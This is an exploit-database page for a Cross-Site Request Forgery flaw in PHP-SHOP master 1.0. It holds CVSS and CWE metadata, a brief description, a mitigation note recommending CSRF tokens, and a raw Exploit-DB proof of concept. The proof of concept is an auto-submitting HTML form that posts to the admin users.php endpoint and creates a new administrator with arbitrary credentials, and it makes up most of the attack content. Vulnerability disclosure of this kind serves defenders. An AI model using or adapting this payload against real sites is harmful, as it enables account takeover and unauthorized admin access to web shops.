header-logo
Suggest Exploit
vendor:
PHP-SHOP
by:
Alireza Norkazemi
5.5
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: PHP-SHOP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:joeyrush:php-shop:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2018

PHP-SHOP master 1.0 – Cross-Site Request Forgery (Add admin)

The PHP-SHOP master 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) attack. An attacker can forge a request to the 'users.php' page and add a new admin user with arbitrary credentials.

Mitigation:

To mitigate this vulnerability, implement proper CSRF protection mechanisms such as using CSRF tokens and validating the origin of requests.
Source

Exploit-DB raw data:

# Exploit Title: PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)
# Exploit Author : Alireza Norkazemi
# Date: 2018-10-15
# Vendor Homepage : https://github.com/joeyrush/PHP-SHOP
# Software link: https://github.com/joeyrush/PHP-SHOP/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A

# Proof of concept:
# Exploit:

<html>
<head>
<meta charset="UTF-8">
<title>POC</title>
</head>
<body>
<form action="http://127.0.0.1/clone/SHOP-PHP/admin/users.php?add=1"
method="post">
<input type="hidden" name="name" value="TEST">
<input type="hidden" name="email" value="TEST2">
<input type="hidden" name="password" value="T3ST123">
<input type="hidden" name="confirm" value="set">
<select name="permissions"><option value="admin,editor"></option></select>
<input type="submit" value="Add User">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR